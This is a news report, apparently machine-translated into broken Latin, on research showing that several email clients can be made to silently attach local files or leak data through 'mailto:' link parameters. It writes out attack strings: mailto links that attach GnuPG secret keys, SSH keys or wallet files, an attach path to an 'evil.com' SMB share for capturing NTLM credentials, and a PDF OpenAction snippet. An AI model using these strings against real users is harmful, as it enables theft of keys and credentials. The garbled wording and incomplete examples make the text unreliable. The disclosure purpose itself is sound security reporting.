Adortus email client users utens "mailto:" nexus"

Investigatores in Universitate Ruhr Bochum (Germania) resolvitur (PDF) mores clientium electronicarum dispensando "mailto:" nexus cum parametris provectis. Quinque ex viginti clientibus electronicis examinati erant vulnerabiles ad oppugnationem machinatorum subsidiorum substitutionis utens parametro "attachiare". Additi sex clientes electronici in PGP et S/MIME clavis postea oppugnationis vulnerabiles erant, et tres clientes impetum vulneraverunt ad contenta epistularum encryptarum extrahendarum.

Vincula Β«http:"usi sunt automate foramen clientis email ut litteras scribendas ad addressee de quibus in nexu. Praeter electronicam, ulteriores parametris partem nexus denotare potes, sicut subiectum litterae et exemplum argumenti typici. Propositus impetus parametri "attachiare" manipulatur, quod permittit tibi nuntium gene- ralem apponere affectum.

Mail clientes Thunderbird, GNOME Evolutionis (CVE-2020-11879), KDE KMail (CVE-2020-11880), Notae IBM/HCL (CVE-2020-4089) et Pegasus Mail vulnerabiles erant ad impetum levem qui te sponte adnectit. cuiuslibet fasciculi localis, certa per nexum sicut "mailto:? attach=path_to_file". Tabella adnectitur sine admonitione, ita sine speciali attentione, utentis non animadvertere potest epistulam mittendam esse cum affixo.

Exempli gratia, nexum utens sicut "mailto:[Inscriptio protected]&sub=Title&body=Text&attach=~/.gnupg/secring.gpg" claves privatas a GnuPG in literam inserere potes. Potes mittere contenta cryptae peras (~/.bitcoin/wallet.dat), claves SSH (~/.ssh/id_rsa) et quaelibet lima usori pervia. Praeterea, Thunderbirds permittit te ut coetus imaginum adiungas larva utendo constructis sicut "attach=/tmp/*.txt".

Praeter locales tabulas, nonnullae clientium electronicarum processus nexus cum retis repositione ac semitis in servo IMAP. Speciatim, IBM Notae permittit te transferre limam e directorio retis cum nexus dispensandi sicut "affigere=\\evil.com\dummyfile", necnon intercipere parametris authenticas NTLM mittendo nexum cum servo SMB regente ab oppugnatore (rogatio mittetur per ambitum usoris authenticas hodiernae).

Thunderbird feliciter processit petitiones sicut "attach=imap:///fetch>UID>/INBOX>1/", quae te permittunt ut contentus e folder in IMAP servo apponas. Eodem tempore, nuntia ab IMAP recepta, per OpenPGP et S/MIME encryptae, automatice ab clientela decrypta sunt priusquam mittant. Tincidunt Thunderbirds erant notificabitur circa quaestionem mense Februario et in exitus 78 Thunderbird quaestio iam fixa est (rami tonitrui 52, 60 et 68 vulnerabiles manent).

Tonitruum veteres versiones vulnerabiles etiam duabus aliis variantibus impugnationibus in PGP et S/MIME ab investigatoribus propositae fuerunt. Praesertim, Thunderbirds, necnon OutLook, PostBox, eM Client, MailMate et R2Mail2 subiectus est clavem reposito oppugnationis, ex eo quod clientium clientium sponte importat et instituat novos libellos in S/MIME nuntios transmissos, quod concedit. oppugnator ad substitutionem claves publicas ordinandas iam ab usuario repositas.

Secundus impetus, quo Thunderbird, PostBox et MailMate susceptibiles sunt, machinae lineamenta tractant pro nuntiis captura autosaving et permittit, parametris mailto adhibitis, ut decryption epistularum encrypted inchoare vel additionis subscriptionis digitalis pro nuntiis arbitrariis, cum posterior transmissio eventus ad servo IMAP oppugnatoris. In hoc impetu, ciphertextus per "corpus" parametrum transmittitur, et "meta reficiendi" tag adhibita adhibita est invitatio ad oppugnatorem IMAP server. Exempli gratia:' '

Ad automatice processus "mailto:" nexus sine commercio usoris, documentorum PDF specialium designatorum adhiberi possunt - actio OpenAtionis in PDF permittit te statim mittere manubrium cum documento aperiendo:

%PDF-1.5
1 0 obj
<< /Type /Catalogus /OpenAction [2 0 R] >>
endobj

2 0 obj
<< /Type /Actionis /S /URI/URI (mailto:?corpus=--INCIPIT PGP NUNTIUM--[…])>>
endobj

Clientem oppugnans users utens "mailto:" nexus

Source: opennet.ru